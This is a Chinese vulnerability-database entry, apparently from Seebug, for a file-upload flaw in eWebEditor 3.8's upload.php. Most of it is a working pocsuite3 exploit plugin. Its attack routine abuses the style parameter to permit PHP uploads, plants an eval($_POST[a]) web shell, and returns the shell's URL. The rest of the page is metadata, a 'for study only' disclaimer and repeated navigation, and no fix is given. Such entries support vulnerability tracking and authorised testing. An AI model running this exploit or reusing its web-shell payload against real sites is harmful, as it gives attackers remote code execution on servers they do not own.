eWebEditor 3.8 /ewebeditor/php/upload.php 文件上传漏洞

基本字段

漏洞编号：: SSV-62427

披露/发现时间：: 2013-04-18

提交时间：: 2013-07-23

漏洞等级：

漏洞类别：: 文件上传

影响组件：: eWebEditor
(漏洞影响:,ewebeditor 3.8)

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0KB

共 0 兑换了

PoC (pocsuite 插件) (pocsuite3 插件)

贡献者 Knownsec 共获得 0KB

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD from pocsuite3.lib.utils import random_str from requests.exceptions import ReadTimeout from urllib.parse import urljoin import re class DemoPOC(POCBase): vulID = '1020' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2011-08-01' createDate = '2013-07-29' updateDate = '2013-07-29' references = ['http://sebug.net/vuldb/ssvid-20860'] name = 'eWebEditor 3.8 /ewebeditor/php/upload.php 文件上传漏洞 POC' appPowerLink = 'http://www.ewebeditor.com/' appName = 'eWebEditor' appVersion = '3.8#' vulType = 'File Upload' desc = ''' 由于style参数可控，导致可以增加PHP格式文件。 ''' samples = [] install_requires = [''] def _verify(self): result = {} try: vul_url = urljoin(self.url, 'ewebeditor/php/upload.php?action=save&type=FILE&style=toby57&language=en') headers = {'Content-Type': 'multipart/form-data; boundary=---------------------------19252181925439'} verify_data = '''-----------------------------19252181925439 Content-Disposition: form-data; name="MAX_FILE_SIZE" 512000 -----------------------------19252181925439 Content-Disposition: form-data; name="aStyle[12]" toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||ËÎÌå||||||0|||jpg|jpeg|||300|||FFFFFF|||1\r\n -----------------------------19252181925439 Content-Disposition: form-data; name="uploadfile"; filename="1.php" Content-Type: application/octet-stream <?php echo '300d4af0950c89b847cf6f7500e6060c'; $url = $_SERVER["PHP_SELF"]; $filename = end(explode("/",$url));unlink($filename);?> -----------------------------19252181925439-- ''' resp = requests.post(vul_url, data=verify_data, headers=headers) res = re.findall("parent\.UploadSaved$\'(.*?)\',\'\'$", resp.text) if not res: return verify_url = urljoin(self.url, res[0]) response = requests.get(verify_url) if response.status_code == 200 and '300d4af0950c89b847cf6f7500e6060c' in response.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = verify_url except Exception as e: logger.error(str(e)) return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): result = {} try: vul_url = urljoin(self.url, 'ewebeditor/php/upload.php?action=save&type=FILE&style=toby57&language=en') headers = {'Content-Type': 'multipart/form-data; boundary=---------------------------19252181925439'} attack_data = '''-----------------------------19252181925439 Content-Disposition: form-data; name="MAX_FILE_SIZE" 512000 -----------------------------19252181925439 Content-Disposition: form-data; name="aStyle[12]" toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||ËÎÌå||||||0|||jpg|jpeg|||300|||FFFFFF|||1\r\n -----------------------------19252181925439 Content-Disposition: form-data; name="uploadfile"; filename="1.php" Content-Type: application/octet-stream <?php echo '300d4af0950c89b847cf6f7500e6060c'; eval($_POST[a]);?> -----------------------------19252181925439-- ''' resp = requests.post(vul_url, data=attack_data, headers=headers) res = re.findall("parent\.UploadSaved$\'(.*?)\',\'\'$", resp.text) if not res: return shell_url = urljoin(self.url, res[0]) response = requests.get(shell_url) if response.status_code == 200 and '300d4af0950c89b847cf6f7500e6060c' in response.text: result['ShellInfo'] = {} result['ShellInfo']['URL'] = shell_url result['ShellInfo']['Content'] = "<?php echo '300d4af0950c89b847cf6f7500e6060c'; eval($_POST[a]);?>" except Exception as e: logger.error(str(e)) return self.parse_output(result) def _shell(self): pass register_poc(DemoPOC)

共 0 兑换

参考链接

http://sebug.net/vuldb/ssvid-20860

解决方案

临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

eWebEditor 3.8 /ewebeditor/php/upload.php 文件上传漏洞

基本字段

来源

漏洞详情

PoC (pocsuite 插件) (pocsuite3 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

eWebEditor 3.8 /ewebeditor/php/upload.php 文件上传漏洞

基本字段

来源

漏洞详情

PoC (pocsuite 插件) (pocsuite3 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定